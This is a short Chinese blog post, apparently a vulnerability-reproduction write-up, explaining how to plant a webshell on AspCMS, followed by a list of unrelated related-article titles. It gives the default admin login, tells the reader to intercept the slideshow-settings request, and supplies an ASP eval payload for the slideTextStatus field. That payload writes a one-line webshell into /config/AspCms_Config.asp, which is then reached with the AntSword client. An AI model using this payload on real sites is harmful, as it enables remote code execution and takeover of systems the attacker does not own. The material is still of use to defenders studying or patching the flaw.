当前位置: 首页 > news >正文

aspcms webshell漏洞复现

news 2024/11/18 7:50:25

步骤一:/admin_aspcms/login.asp访问后台,admin 123456 登录

步骤二:点击【扩展功能】【幻灯片设置】点击【保存】开启代理进行抓包

步骤三:.在抓取的数据包中修改 slideTextStatus 字段的值为以下代码并进行发包 访问影响文件

字段值
1%25><%25Eval(Request (chr(65)))%25><%25 密码是a

影响文件
/config/AspCms_Config.asp

步骤四:蚁剑连接


http://www.mrgr.cn/news/28125.html

相关文章:

  • PCL算法汇总
  • 多轮对话中让AI保持长期记忆的8种优化方式篇
  • 自动化生成测试用例:利用OpenAI提升电商网站测试覆盖率
  • 大模型基础BERT——Transformers的双向编码器表示
  • 第三章springboot数据访问
  • layui的table组件中,对某一列的文字设置颜色为浅蓝怎么设置
  • 卡拉兹(Callatz)猜想也叫(3n+1)猜想
  • 【数据结构】排序算法---希尔排序
  • 第T11周:优化器对比实验
  • Vue基础
  • 【C++】深入理解作用域和命名空间:从基础到进阶详解
  • 深入浅出Java匿名内部类:用法详解与实例演示
  • 有了数据中台,是否需要升级到数据飞轮?怎么做才能升级到数据飞轮?
  • 包装盒型自动生成插件 Origami Boxshot illustrator盒型自动生成插件
  • 北大对齐团队独家解读:OpenAI o1开启「后训练」时代强化学习新范式
  • SpringCloud-05 Resilience4J 服务降级和熔断
  • 汽车英文单词缩写汇总
  • 【Multi-UAV】多无人机实现凸多边形区域覆盖--Voronoi分割
  • 进程状态、进程创建和进程分类
  • 使用合成数据进行自我提升的扩散模型
  • 【AI视频】复刻抖音爆款AI数字人作品初体验
  • 链表在开空间时候出现的问题
  • 2024年9月15日
  • 添加文字+更改音乐+更改比例+添加背景
  • 【推荐项目】大学生心理预约管理系统
  • 【每日一题】LeetCode 1184.公交站间的距离问题(数组)